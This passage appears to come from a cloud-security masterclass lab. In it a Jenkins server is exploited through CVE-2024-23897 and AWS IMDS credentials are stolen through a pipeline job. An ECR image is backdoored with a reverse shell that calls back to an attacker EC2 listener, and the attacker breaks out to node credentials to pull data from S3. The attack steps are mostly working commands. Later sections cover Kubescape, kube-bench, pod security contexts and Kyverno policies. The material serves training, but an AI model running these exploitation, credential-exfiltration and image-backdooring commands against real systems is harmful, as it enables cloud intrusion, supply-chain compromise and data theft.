export APP_IP=$(jq -r '.instance_public_ip.value' < ec2_output.json)

alt text

  • Let's install nmap to perform the port scan.
sudo apt install nmap -y

alt text

  • Run a quick port scan using nmap with the IP set as a variable.
nmap -Pn -T4 --top-ports 1000 --max-retries 0 $APP_IP

alt text

  • Run the curl command to validate the response.
curl -I http://$APP_IP:8080

alt text

This confirms Jenkins is running, Jenkins version: 2.441.

  • Search for the latest CVE associated with Jenkins 2.441.
Vulnerable to CVE-2024-23897(Arbitrary File Read Vulnerability)

This is arbitrary file read vulnerability, which needs to be exploited to get a reverse shell to access the AWS Infra. We can also try to Bruteforce jenkins username & password.

  • Validate the CVE-2024-23897.

CVE-2024-23897 in Jenkins occurred due to improper validation of user inputs, allowing attackers to exploit a deserialization vulnerability in the Jenkins CLI (Command-Line Interface), leading to remote code execution. The root cause was Jenkins' failure to securely handle untrusted input, allowing malicious data to be processed without proper checks, which can then execute arbitrary code on the Jenkins server.

Exploitation

  • For exploitation, download the jenkins-cli.jar file from the application running on port 8080, run the command.
mkdir -p jenkins_cve
cd jenkins_cve

curl -O http://$APP_IP:8080/jnlpJars/jenkins-cli.jar

ls

alt text

  • Run the command to confirm the exploitability.
JAR_FILE="jenkins-cli.jar"
JENKINS_URL="http://$APP_IP:8080"
CMD="help"
PAYLOAD="1"
EXPLOIT_FILE="/proc/self/environ"

java -jar $JAR_FILE -s $JENKINS_URL $CMD $PAYLOAD "@$EXPLOIT_FILE"

alt text

  • Get the password of vulnerable jenkins instance.

This path /var/jenkins_home/init.groovy.d/init.groovy is modified to be accessible via jenkins user.

JAR_FILE="jenkins-cli.jar"
JENKINS_URL="http://$APP_IP:8080"
CMD="help"
PAYLOAD="1"
EXPLOIT_FILE="/var/jenkins_home/init.groovy.d/init.groovy"

java -jar $JAR_FILE -s $JENKINS_URL -http connect-node  "@$EXPLOIT_FILE"

alt text

Additional Step

  • Change the directory to /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve
  • Create a ec2 instance to demonstrate as attacker to perform reverse shell.

This instance will be deployed in the us-east-1 region, and the lab will be deleted once this section is complete. While using 0.0.0.0/0 for security group configuration is not recommended as a best practice, we will use this insecure configuration to simplify the setup.

aws ec2 create-key-pair --key-name peachycloudsecurity --query 'KeyMaterial' --output text --region us-east-1 > peachycloudsecurity.pem && chmod 400 peachycloudsecurity.pem && export SG_ID=$(aws ec2 create-security-group --group-name peachycloudsecurity-sg --description "Allow all traffic" --region us-east-1 --query 'GroupId' --output text) && aws ec2 authorize-security-group-ingress --group-id $SG_ID --protocol -1 --port all --cidr 0.0.0.0/0 --region us-east-1 && export INSTANCE_ID=$(aws ec2 run-instances --image-id ami-0ebfd941bbafe70c6 --instance-type t2.micro --key-name peachycloudsecurity --security-group-ids $SG_ID --region us-east-1 --query 'Instances[0].InstanceId' --output text) && aws ec2 wait instance-running --instance-ids $INSTANCE_ID --region us-east-1 && export PUBLIC_IP=$(aws ec2 describe-instances --instance-ids $INSTANCE_ID --region us-east-1 --query 'Reservations[0].Instances[0].PublicIpAddress' --output text) && sleep 10
  • Export attacker's ec2 instance IP variables.
export ATTACKER_PUBLIC_IP=$(aws ec2 describe-instances --filters "Name=key-name,Values=peachycloudsecurity" "Name=instance-state-name,Values=running" --query 'Reservations[0].Instances[0].PublicIpAddress' --output text --region us-east-1)

  • Confirm the public IP by echo command.

If this output is blank, then attacker's ec2 instance is not running or having some issues.

echo $ATTACKER_PUBLIC_IP

Reference

  • https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897

Using IMDSv2 to exfiltrate Credentials

⚡ Attention ⚡

💡 Do not switch terminals unless stated below, or you'll need to re-export environment variables.

🛠️ Customization Notice 🛠️

🔧 These commands are tailored for this lab. Adapt them for your specific use case.


  • For this lab, no reverse shell, instead we will directly exploit IMDS v2 metadata API.
    • Make sure you are inside jenkins_cve folder.
    • If not, run the command to change directory.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve
  • Setup the vulnerable IP as variable, so that it can be referenced.
export APP_IP=$(jq -r '.instance_public_ip.value' < ../ec2_output.json)
  • Get the URL.
echo $APP_IP

Jenkins Freestyle Pipeline to Run Command

  • Login to the Jenkins via username & password got from previous section.

alt text

  • Access Jenkins:
    • Open your Jenkins dashboard in your browser.

alt text

  • Create a New Freestyle Project:
    • Click on "New Item" from the Jenkins dashboard.
    • Enter a project name (e.g., Simple_LS_Pipeline).
    Simple_LS_Pipeline
    
    • Select Freestyle project and click "OK."

alt text

  • Configure the Project:

    • On the project configuration page, scroll down to the Build Steps section.
  • Add a Build Step

    • Under the Build Steps section, click on Add build step.
    • Select Execute shell (for Linux/Mac).

alt text

  • In the Execute shell, add the command to extract the AWS temporary keys.

Run this inside Jenkins pipeline.

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

IAM_ROLE=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/")

curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE"

alt text

AWS Keys starting with ASIA are temporary keys & keys starting with AKIA are permanent keys.

  • Save the Configuration:

    • Scroll down and click Save.
  • Run the Job:

    • On the project page, click Build Now to run the pipeline. Wait for few seconds. alt text
  • Check Console Output:

    • After the job completes, click on the build number in the Build History.
    • Select Console Output to view the result of the ls command.

alt text

  • Check the results with Access Key, Secret Key and Session Token.

alt text

  • To download the result.
    • Click on View as plain text.

alt text

  • Copy the URL.

alt text

  • Download the file onto the codespace termninal.

Make sure to validate the build id & name of the free style job, before downloading the file.

wget -O cred.txt http://$APP_IP:8080/job/Simple_LS_Pipeline/1/consoleText
In case of error, check the correct build ID before downloading cred.txt.

alt text

  • Check the cred.txt to make sure we have valid credentials.
grep -q '"AccessKeyId"' cred.txt && grep -q '"SecretAccessKey"' cred.txt && echo "Valid cred.txt" || echo "Error: Check the console log manually. Invalid cred.txt"
  • Make sure, current directory is jenkins_cve.
export AWS_ACCESS_KEY_ID=$(grep -oP '(?<="AccessKeyId" : ")[^"]*' cred.txt) \
&& export AWS_SECRET_ACCESS_KEY=$(grep -oP '(?<="SecretAccessKey" : ")[^"]*' cred.txt) \
&& export AWS_SESSION_TOKEN=$(grep -oP '(?<="Token" : ")[^"]*' cred.txt)
  • Validate the exported AWS credentials.
aws sts get-caller-identity

alt text

  • This confirms we have exploited the IMDSV2 and extracted the AWS EC2 credentials.

Reference

  • https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2024-23897

Enumerate ECR repositories using credentials

⚡ Attention ⚡

💡 Do not switch terminals unless stated below, or you'll need to re-export environment variables.

🛠️ Customization Notice 🛠️

🔧 These commands are tailored for this lab. Adapt them for your specific use case.


  • Change directory
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
  • Again export the credentials.
export AWS_ACCESS_KEY_ID=$(grep -oP '(?<="AccessKeyId" : ")[^"]*' cred.txt) \
&& export AWS_SECRET_ACCESS_KEY=$(grep -oP '(?<="SecretAccessKey" : ")[^"]*' cred.txt) \
&& export AWS_SESSION_TOKEN=$(grep -oP '(?<="Token" : ")[^"]*' cred.txt)
curl -L https://github.com/securisec/cliam/releases/download/2.2.0/cliam-linux-64bit.tar.gz | tar -xz && sudo mv cliam /usr/local/bin/ && sudo chmod +x /usr/local/bin/cliam 

  • Let's enumerate the permissions manually.

As this lab is related to EKS & ECR, we will directly enumerate these services.

aws ecr describe-repositories
aws ecr describe-registry
aws eks list-clusters 
🚨 Solution: In case of error: An error occurred (AccessDeniedException) 😱.
⚠️ *Don't cheat! Still want the answer?* 👉 *Click below if you're sure...*

alt text

  • Let' use cliam to enumerate the permissions of eks & ecr.
cliam aws enumerate --access-key-id $AWS_ACCESS_KEY_ID --secret-access-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN ecr

cliam aws enumerate --access-key-id $AWS_ACCESS_KEY_ID --secret-access-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN eks
⚠️ In case still facing issue No valid aws services detected by cliam as well? 😱.
👉 *Check this below..*

alt text

  • Let's again run the cliam command and review the changes in the command mentioned below for both services.
Run the cliam cli command.
for region in us-east-1 us-west-2; do cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" ecr --region $region; done

for region in us-east-1 us-west-2; do cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" eks --region $region; done
  • Set the default region using one-liner before proceeding further.

This will set the default region based on output.

for region in us-east-1 us-west-2; do
  output=$(cliam aws enumerate --access-key-id "$AWS_ACCESS_KEY_ID" --secret-access-key "$AWS_SECRET_ACCESS_KEY" --session-token "$AWS_SESSION_TOKEN" ecr --region $region)
  
  if echo "$output" | grep -q "INF"; then
    echo "Setting region $region as default"
    export AWS_DEFAULT_REGION=$region
    break
  fi
done
  • Using describe repo, list the image from ecr.
export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryName' --output text) && aws ecr list-images --repository-name "$repo"
  • Similarly list the cluster running.

The cluster starting with peachycloudsecurity-<randomvalue> is lab cluster.

aws eks list-clusters 
  • Pull the image from the ECR repository. Also get the current image tag.

As we dont' know as attacker what tag is used in the image, we are using aws ecr list-images and getiting the latest tag.

export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text) && export image=$(aws ecr list-images --repository-name $(echo $repo | cut -d'/' -f2) --query 'imageIds[0].imageTag' --output text) 

docker pull "$repo:$image"
  • As the tag has been identified in the image, in this case it is latest
    • Pull the same image with latest image tag to demonstrate attacker can first get the correct tag and pull the image.
    • The attacker can also try to guess and pull other image tags using common naming patterns.

In real life, the tag of a Docker image can change depending on the organization. An attacker can pull the image and then tag it with the same Docker image tag.

repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text)
image_tag="latest"
docker pull "$repo:$image_tag"

Credit

Backdooring a Docker Image

⚡ Attention ⚡

💡 Conitnue using same terminal. Do not switch terminals unless stated below, or you'll need to re-export environment variables.

  • Change directory to jenkins_cve, to make make sure folder structure is as per lab steps.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
  • Set the repo
export repo=$(aws ecr describe-repositories --query 'repositories[0].repositoryUri' --output text)
export image_tag="latest"
  • Set the default region using one-liner before proceeding further.

This will set the default region based on output.

  • Login to AWS ECR.
export AWS_DEFAULT_REGION=$(echo "$repo:$image_tag" | awk -F. '{print $4}')

export aws_account_id=$(aws sts get-caller-identity --query "Account" --output text) && aws ecr get-login-password | docker login --username AWS --password-stdin $aws_account_id.dkr.ecr.$AWS_DEFAULT_REGION.amazonaws.com
  • Pull the image to be backdoored.
docker pull "$repo:$image_tag"
  • Generate the backdoor the image.
python3 ../solution/backdoor.py \
  --input "$repo:$image_tag" \
  --output "$repo:$image_tag" \
  --listener "$ATTACKER_PUBLIC_IP" \
  --port 1337 \
  --shell-url "https://github.com/cr0hn/dockerscan/raw/master/dockerscan/actions/image/modifiers/shells/reverse_shell.so"

alt text

  • Push the backdoor image.
docker push $repo:$image_tag

Exploiting AWS EKS Cluster

alt text

⚡ Preparing the attacker's terminal ⚡

Open new terminal in codespace and ssh into attacker's ec2 to get the reverse shell via backdoor and exploit the EKS.

  • Change directory to /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve
  • Get the public IP of attacker's ec2 instance & ssh.

This is simulating as attacker, to perform reverse shell. Inside ec2 for reverse shell.

export ATTACKER_PUBLIC_IP=$(aws ec2 describe-instances --filters "Name=key-name,Values=peachycloudsecurity" "Name=instance-state-name,Values=running" --query 'Reservations[0].Instances[0].PublicIpAddress' --output text --region us-east-1)


ssh -i peachycloudsecurity.pem ec2-user@$ATTACKER_PUBLIC_IP
  • Install pwncat-cs (alternative to netcat for reverse shell)
sudo yum install python3-pip -y # For CentOS/RHEL/Amazon Linux
sudo python3 -m pip install pwncat-cs

Get the Reverse Shell as Attacker

As we have pushed backdoor image, start the listener waiting for the connection from EKS pod.

Wait for 5 minutes to get reverse shell from EKS pod.

  • Run the pwncat-cs to get the reverse shell.

Similar to netcat

pwncat-cs 0.0.0.0 1337
  • Hit CTRL+D to get the pods' shell.

Run these commands within the pod, after getting the revere shell.

  • Install kubectl, run the following commands based on the system's architecture.
echo "Installing kubectl..."
ARCH=$(uname -m)
case $ARCH in
    x86_64) BIN_ARCH="amd64" ;;
    aarch64) BIN_ARCH="arm64" ;;
    *) echo "Unsupported architecture: $ARCH"; exit 1 ;;
esac
curl -LO "https://dl.k8s.io/release/$(curl -L -s https://dl.k8s.io/release/stable.txt)/bin/linux/$BIN_ARCH/kubectl"
install -o root -g root -m 0755 kubectl /usr/local/bin/kubectl
echo "kubectl installation complete."

Again run the pwncat-cs listener to get the reverse shell if exited.

  • Set the Kubernetes configuration explicitly with the service account token, CA certificate, and API server URL.
# Set the correct KUBERNETES_SERVICE_HOST
export KUBERNETES_SERVICE_HOST=kubernetes.default.svc

# Get the service account token and CA certificate
export TOKEN=$(cat /run/secrets/kubernetes.io/serviceaccount/token)
export CACERT=/run/secrets/kubernetes.io/serviceaccount/ca.crt

# Set up the kubectl configuration to use the token
kubectl config set-cluster default-cluster --server=https://${KUBERNETES_SERVICE_HOST}:443 --certificate-authority=${CACERT}
kubectl config set-credentials default-admin --token=${TOKEN}
kubectl config set-context default-system --cluster=default-cluster --user=default-admin
kubectl config use-context default-system

To get cluster IP kubectl get svc -n default kubernetes.

Performing post-exploitation enumeration in the EKS Cluster.

  • Check permissions using auth can-i
kubectl auth can-i --list
  • Now run kubectl commands.
kubectl get pods

kubectl get pods -A 
  • Get cluster roles & roles
kubectl get roles
kubectl get clusterroles
  • Get namespaces of the cluster.

A namespace is a virtual cluster that helps divide and isolate resources (like pods, services, and deployments) within a physical cluster

kubectl get namespaces
  • Get secrets to check if any secret is present or accessible.
kubectl get secrets -A
⚠️ In such a short time, do we have any other way to get the flag? 😱.

Use IMDSV2 to get the credentials and use it on local. Before that, let's see the next lab.

Credits

Breakout from Pod to Node using privileged credentials

Continue using the same terminal.

Again run the pwncat-cs listener to get the reverse shell.

  • Inside eks pod, run below comands.
apt update && apt install unzip less -y
  • Install aws cli
curl "https://awscli.amazonaws.com/awscli-exe-linux-x86_64.zip" -o "awscliv2.zip"
unzip awscliv2.zip
./aws/install
rm -rf awscliv2.zip aws

In case exited from eks pod, exit from pwncat-cs by typing exit.

Again run the pwncat-cs listener to get the reverse shell.

Again IAM perfom Enumeration.

  • Run aws cli commands
aws sts get-caller-identity
  • To check whether using node IAM role or pod service account including IRSA & pod identity in Kubernetes.

    • Check for annotations in environment variables
    env | grep AWS_ROLE_ARN
    env | grep AWS_WEB_IDENTITY_TOKEN_FILE
    
    • Check if the pod is using node's IAM role via IMDS V1.

    In case of IMDS V2, need to send PUT request and then send token in Header.

    curl 169.254.169.254/latest/meta-data/iam/security-credentials/
    
    • Verify the service account attached to the pod by checking for the annotation that links the service account to an IAM role.
    kubectl get serviceaccount <service-account-name> -o yaml
    
⚠️ In such a short time, do we have any other way to get the flag? 😱.
Use IMDSV2 to get the credentials and use it on local.
echo "This can trigger guardduty and other monitoring solutions like Falco as this is suspicious command."

TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600")

IAM_ROLE=$(curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/")

curl -H "X-aws-ec2-metadata-token: $TOKEN" "http://169.254.169.254/latest/meta-data/iam/security-credentials/$IAM_ROLE"

Exit from pod as well as from attacker's ec2 instance along with pwncat interactive shell.

Create a new file in codespace and paste the exfiltrated json data including AccessKeyId, SecretAccessKey & SessionToken.

  • Copy paste the json like object in a txt file
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
touch leaked.txt
  • Output should look like this
{
    "Credentials": {
        "AccessKeyId": "ASIAXXXXXX",
        "SecretAccessKey": "wJalrXUtnFEMI/K7MDENG/bPxRfiCYXXXXX",
        "SessionToken": "IQoJb3JpZ2luX2VjEXAMPLEXXXX...",
        "Expiration": "2024-09-30T23:59:59Z"
    }
}

Manual Steps Involved...

  • Export the temporary credentials to get the permissions of the node.
export AWS_ACCESS_KEY_ID="ASIAXXXXXX"
export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYXXXXX"
export AWS_SESSION_TOKEN="IQoJb3JpZ2luX2VjEXAMPLEXXXX..."
export DEFAULT_REGION="us-east-1 or us-west-2"
  • Run the aws cli command to confirm permissions.

This confirms we have got the permission of EKS nodes, confirming breakout.

aws sts get-caller-identity 
  • Enumerate IAM
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
git clone https://github.com/andresriancho/enumerate-iam.git
cd enumerate-iam

python3 -m pip install -r requirements.txt
  • Manually replace these values from the file and run the tool.

Make sure to update the region as per the preference.

python3 enumerate-iam.py --access-key $AWS_ACCESS_KEY_ID --secret-key $AWS_SECRET_ACCESS_KEY --session-token $AWS_SESSION_TOKEN --region $DEFAULT_REGION

alt text

Check there is permission to list s3 bucket.

  • Hit Ctrl+C again to force exit.

Command in case of mac.

Ctrl+C

Lab: Privilege Escalation & S3 Exploitation for Flag

Continue using the same terminal on which exfiltrated credentials are configured.

  • Change directory to jenkins_cve.
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve 
  • Use node credentials to list internal s3 bucket and get the flag.

S3 endpoints region agnostic.

aws s3 ls

  • Get the data from internal bucket, demonstrating attacker was able to exflitrate the data.
export VICTIM_BUCKET=$(aws s3 ls | grep 'peachycloudsecurity-' | awk '{print $3}')

aws s3 ls s3://$VICTIM_BUCKET
aws s3 cp s3://$VICTIM_BUCKET/flag.txt . && cat flag.txt

Lab: Cleanup EC2 Instance

Open new codespace terminal.

alt text

Attackers EC2 Deletion Steps:

  • Change the directory
cd /workspaces/ecr_eks_security_masterclass_public/eks/jenkins_cve
  • Terminate the EC2 instance.

If changed to other region, then replace that region.

export AWS_DEFAULT_REGION=us-east-1

export INSTANCE_ID=$(aws ec2 describe-instances --filters "Name=key-name,Values=peachycloudsecurity" "Name=instance-state-name,Values=running" --query 'Reservations[0].Instances[0].InstanceId' --output text --region $AWS_DEFAULT_REGION)

aws ec2 terminate-instances --instance-ids $INSTANCE_ID --region $AWS_DEFAULT_REGION
  • Check instance termination.
aws ec2 describe-instances --instance-ids $INSTANCE_ID --region $AWS_DEFAULT_REGION --query 'Reservations[0].Instances[0].State.Name'
  • Delete the key pair.
aws ec2 delete-key-pair --key-name peachycloudsecurity --region $AWS_DEFAULT_REGION
  • Remove the local key file:
rm -f peachycloudsecurity.pem

Automated Scanning in EKS: Why, What, and How

Why Automated Scanning?

Automated scanning in Amazon Elastic Kubernetes Service (EKS) is crucial for maintaining the security and compliance of your containerized applications. Kubernetes, while powerful, has complex configurations and multiple layers (containers, images, nodes, etc.) that can expose vulnerabilities if left unchecked. Automated scanning ensures:

  • Proactive Security: Identify vulnerabilities, misconfigurations, and compliance issues early.
  • Consistency: Continuously monitor the cluster without manual intervention.
  • Compliance: Align with security standards like CIS Benchmarks and other industry best practices.

What is Automated Scanning?

Automated scanning involves using tools and frameworks to automatically:

  1. Scan Container Images: Identify outdated libraries, vulnerabilities, or insecure packages in your container images.
  2. Audit Kubernetes Configurations: Ensure best practices are followed in deployment files, manifests, and cluster configurations.
  3. Assess Runtime Security: Monitor active workloads for abnormal behavior or misconfigurations.
  4. Enforce Compliance Standards: Generate reports based on predefined policies or benchmarks.

How Does Automated Scanning Work?

  1. Integration with CI/CD Pipelines:
    • Tools are integrated during the build or deployment phase to catch issues early (e.g., image scanning before deployment).
  2. Continuous Cluster Monitoring:
    • Agents or tools run within the EKS cluster to monitor configurations, permissions, and runtime behavior.
  3. Policy Enforcement:
    • Define security policies that trigger alerts or block deployments if violations are detected.
  4. Reporting and Alerts:
    • Centralized dashboards and notifications help teams prioritize and fix issues effectively.

Next Steps

In the next chapter, we’ll explore Kubescape and Kubebench, two essential tools for auditing and securing your Kubernetes clusters. These tools provide automated scanning capabilities for configurations, workloads, and compliance checks tailored for Kubernetes environments.

Hands-On Lab: Security Auditing with Kubescape

Kubescape is a Kubernetes security scanner that checks for misconfigurations, vulnerabilities, and compliance against frameworks like NSA-CISA and MITRE ATT&CK. This hands-on lab guides you through setting up and running Kubescape in a simple namespace.

Hands on Lab

  • Navigate to the EKS Directory:

    cd /workspaces/ecr_eks_security_masterclass_public/eks/
    
  • Install Kubescape on your system:

    curl -s https://raw.githubusercontent.com/kubescape/kubescape/master/install.sh | bash
    
  • Verify the installation:

    export PATH=$PATH:/home/codespace/.kubescape/bin
    
    kubescape version
    
  • Run a basic scan for the entire cluster:

    kubescape scan framework nsa
    
  • To scan a specific namespace, create a namespace and deploy a sample workload:

    kubectl create namespace kubescape-lab
    kubectl run nginx --image=nginx --namespace=kubescape-lab
    
  • Scan only the kubescape-lab namespace:

    kubescape scan framework nsa --include-namespaces kubescape-lab
    
  • After running the scan, you’ll see results highlighting:

    • Critical issues (e.g., misconfigured RBAC, insecure ports).
    • Compliance status.
  • Save the results to a file for further review:

    kubescape scan framework nsa --output json > kubescape-results.json
    

Cleanup(Optional)

  • Delete the namespace and resources:

    kubectl delete namespace kubescape-lab
    
  • Remove Kubescape:

    rm $(which kubescape)
    

Hands-On Lab: Security Benchmarking with Kubebench

Kubebench checks your Kubernetes cluster against the CIS (Center for Internet Security) Kubernetes Benchmark. This lab demonstrates how to install and run Kubebench to ensure your cluster aligns with security best practices.

Hands on Lab

  • Navigate to the EKS directory:

    cd /workspaces/ecr_eks_security_masterclass_public/eks/
    
  • Download the Kubebench YAML file for your cluster:

    curl -sLO https://raw.githubusercontent.com/aquasecurity/kube-bench/main/job.yaml
    
  • Apply the YAML file to create a Kubebench job:

    kubectl apply -f job.yaml
    
  • Wait for the job to complete:

    kubectl get jobs
    
  • Retrieve the results from the job pod:

    POD_NAME=$(kubectl get pods --selector=job-name=kube-bench -o jsonpath='{.items[0].metadata.name}')
    kubectl logs $POD_NAME
    
  • Review the output for failed checks.

  • Each check aligns with the CIS benchmark, such as:

    • API server security configurations.
    • Pod security settings.
    • RBAC configurations.

Optional Cleanup

  • Delete the Kubebench job and resources:
    kubectl delete -f job.yaml
    

Defense & Hardening in EKS

Effective defense and hardening in Amazon EKS involve securing workloads, enforcing compliance, and detecting runtime threats. Below are key focus areas:

Pod and Container Security Context

  • Use Kubernetes security contexts to define permissions and constraints at the pod/container level.
  • Enforce practices like:
    • Running containers as non-root users.
    • Setting file system as read-only.
    • Restricting privileged escalation.

Policy Enforcement with Kyverno and CEL

  • Kyverno: A Kubernetes-native policy engine to validate, mutate, and enforce best practices.
  • CEL (Common Expression Language): Lightweight expressions for custom rules in admission controllers.
  • Define policies for image scanning, resource limits, and namespace isolation.

Threat Detection with AWS GuardDuty

  • A managed threat detection service integrating with EKS.
  • Detects anomalies, such as suspicious API calls, unauthorized access, and malicious behavior in the control plane and nodes.

Runtime Security with eBPF and Tetragon

  • Use eBPF (Extended Berkeley Packet Filter) for real-time observability and security at the kernel level.
  • Tetragon: Monitors process execution, network activity, and policy violations in runtime environments without significant overhead.

Lab: Pod Security Context in EKS

  • Pod Security Context allows you to define security settings for pods and containers. In this lab, we'll create a pod with a security context that enforces a read-only root filesystem and validate its behavior.

  • List of common pod security context:

    • runAsUser: Specifies the user ID to run the container processes.
    • runAsGroup: Sets the primary group ID for the container processes.
    • runAsNonRoot: Ensures the container runs as a non-root user.
    • fsGroup: Defines the file system group ID for volume mounts.
    • supplementalGroups: Adds additional group IDs to the container's process.
    • allowPrivilegeEscalation: Prevents processes from gaining additional privileges.
    • privileged: Grants the container access to all devices on the host.
    • readOnlyRootFilesystem: Enforces the root filesystem to be read-only.
    • capabilities: Adds or drops Linux capabilities for the container.
    • seLinuxOptions: Sets SELinux labels for the container.
    • seccompProfile: Applies a seccomp profile to restrict system calls.
    • procMount: Modifies the /proc filesystem mount type.
    • sysctls: Configures namespaced kernel parameters (sysctls) for the pod.
    • windowsOptions: Specifies Windows-specific security settings.
    • appArmorProfile: Assigns an AppArmor security profile to the container.

Hands-on Lab

  • Navigate to the EKS Directory:

    cd /workspaces/ecr_eks_security_masterclass_public/eks/
    
  • Verify the cluster is ready:

    kubectl get nodes
    
  • Create a pod-security-context.yaml file:

    cat <<EOF > pod-security-context.yaml
    apiVersion: v1
    kind: Pod
    metadata:
      name: read-only-pod
    spec:
      containers:
      - name: nginx
        image: nginx:latest
        securityContext:
          readOnlyRootFilesystem: true  # Enforce read-only root filesystem
        command: ["/bin/sh", "-c", "sleep 3600"]
    EOF
    
  • Apply the manifest to the EKS cluster:

    kubectl apply -f pod-security-context.yaml
    
  • Verify the pod is running:

    kubectl get pods
    
  • Verify Read-Only Root Filesystem:

    • Test writing to the root filesystem (denied):

      kubectl exec read-only-pod -- touch /testfile
      

      This command should fail because the root filesystem is read-only.

Cleanup

  • Delete the pod:

    kubectl delete pod read-only-pod
    

Lab: Disallowing the latest Tag in Container Images Using Kyverno and CEL on Amazon EKS

Prerequisites

  • Amazon EKS Cluster: Already running and kubectl is configured to interact with it.
  • kubectl: Installed and configured to connect to your EKS cluster.
  • Helm: Installed on your local machine.

Part:1 Introduction to Common Expression Language (CEL)

  • What is CEL?

    • CEL is a simple, readable expression language used to write conditions and validations in code and configurations. In Kubernetes, it's used to define rules for resource validation.
  • CEL Playground

    • Practice writing CEL expressions using the online tool: CEL Playground.
Basic CEL Expressions

Here are four basic examples to illustrate how CEL works.

  • Example 1: Arithmetic Operations
// Expression
1 + 2 * 3 - 4 / 2

// Evaluates to
5.0
  • Example 2: String Operations
// Expression
"Hello, " + "World!"

// Evaluates to
"Hello, World!"
  • Example 3: Logical Operations
// Expression
true && !false

// Evaluates to
true
  • Example 4: Conditional Expressions
// Expression
size([1, 2, 3]) == 3 ? "Three elements" : "Not three"

// Evaluates to
"Three elements"
  • Applying CEL in Kubernetes Policies

Here's how CEL is used in a Kyverno policy to disallow the use of the latest tag in container images.

apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-latest-tag
spec:
  validationFailureAction: Enforce
  rules:
  - name: disallow-latest-tag
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      cel:
        expressions:
          - expression: "object.spec.containers.all(c, !c.image.matches('.*:latest$'))"
            message: "Using the 'latest' tag is not allowed."
  • Explanation
    • object: The resource being evaluated (e.g., a Pod).
    • object.spec.containers: List of containers in the Pod.
    • all(c, condition): Checks that the condition is true for all containers c.
    • !c.image.matches('.*:latest$'): Ensures the image does not end with :latest.

Part:2 Hands on Lab

  • Navigate to the EKS Directory:
cd /workspaces/ecr_eks_security_masterclass_public/eks/
  • Ensure that kubectl can communicate with your EKS cluster.
# Verify cluster nodes
kubectl get nodes
  • Install Kyverno in the kyverno Namespace using Helm.
# Add Kyverno Helm repository
helm repo add kyverno https://kyverno.github.io/kyverno/

# Update Helm repositories
helm repo update

# Create Kyverno Namespace
kubectl create namespace kyverno

# Install Kyverno using Helm
helm install kyverno kyverno/kyverno -n kyverno
  • Check that the Kyverno pod is running.
# Check Kyverno pods
kubectl get pods -n kyverno
  • Understand CEL Basics in Kyverno

Common Expression Language (CEL) allows you to write expressions for custom validations in Kyverno policies.

  • Variables:

    • object: The resource being validated.
    • namespaceObject: The Namespace of the resource.
  • Expressions: Use CEL to define conditions that resources must meet.

  • Now, create a policy that blocks the creation of Pods using container images tagged with latest.

  • Use the cat << EOF > filename method to create the policy file.

# Create the policy file
cat << EOF > disallow-latest-tag.yaml
apiVersion: kyverno.io/v1
kind: ClusterPolicy
metadata:
  name: disallow-latest-tag
spec:
  validationFailureAction: Enforce
  background: false
  rules:
  - name: disallow-latest-tag
    match:
      any:
      - resources:
          kinds:
          - Pod
    validate:
      cel:
        expressions:
          - expression: "object.spec.containers.all(c, !c.image.matches('.*:latest$'))"
            message: "Using the 'latest' tag is not allowed."
EOF
  • Apply the policy using kubectl.
# Apply the policy
kubectl apply -f disallow-latest-tag.yaml
  • Now to validate, create a Pod definition file that uses the latest tag.
# Create the Pod definition file
cat << EOF > pod-with-latest.yaml
apiVersion: v1
kind: Pod
metadata:
  name: test-pod-latest
spec:
  containers:
  - name: nginx
    image: nginx:latest
EOF
  • Attempt to create the Pod.
# Apply the Pod definition
kubectl apply -f pod-with-latest.yaml
  • Expected Result will be error message indicating that the Pod creation is blocked by the Kyverno policy.
Error from server: error when creating "pod-with-latest.yaml": admission webhook "validate.kyverno.svc-fail" denied the request:

resource Pod/default/test-pod-latest was blocked due to the following policies

disallow-latest-tag:
  disallow-latest-tag: Using the 'latest' tag is not allowed.
  • Create a Pod definition file that uses a specific version tag.
# Create the Pod definition file
cat << EOF > pod-with-version.yaml
apiVersion: v1
kind: Pod
metadata:
  name: test-pod
spec:
  containers:
  - name: nginx
    image: nginx:1.19
EOF
  • Apply the Pod definition.
# Apply the Pod definition
kubectl apply -f pod-with-version.yaml
  • Expected Result will show that the Pod should be created successfully.
pod/test-pod created
  • Verify the Pod is running:
# Get the list of Pods
kubectl get pods

Clean Up

  • Delete the Pods and policy created during this lab.
# Delete the Kyverno policy
kubectl delete -f disallow-latest-tag.yaml

# Delete the Pods
kubectl delete -f pod-with-latest.yaml
kubectl delete -f pod-with-version.yaml


